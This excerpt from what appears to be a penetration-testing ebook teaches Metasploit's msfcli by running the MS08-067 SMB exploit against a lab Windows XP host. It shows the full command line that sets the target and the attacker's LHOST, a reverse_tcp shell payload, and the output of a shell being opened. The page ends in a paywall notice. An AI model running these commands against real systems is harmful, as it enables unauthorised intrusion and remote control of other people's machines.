MSFCLI

As with the MSFConsole interface, a CLI provides extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole.

To access msfcli, use the Terminal to execute the following command:

 # msfcli -x

This will display all of the available modes similar to that of MSFConsole, as well as usage instructions for selecting the particular module and setting its parameters. Note that all of the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit:

    # msfcli windows/smb/ms08_067_netapi O
    [*] Please wait while we load the module tree...
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, 
SRVSVC)

The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter:

    # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
    [*] Please wait while we load the module tree...
    
    Compatible payloads
    ===================
    
       Name                             Description
       ----                             -----------
    generic/debug_trap               Generate a debug trap in the target process
    generic/shell_bind_tcp           Listen for a connection and spawn a command shell
    ...

Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit:

    # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
    [*] Please wait while we load the module tree...
    [*] Started reverse handler on 192.168.0.3:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (240 bytes) to 192.168.0.7
    [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:WINDOWSsystem32>

As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for a chosen payload.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.144.116.159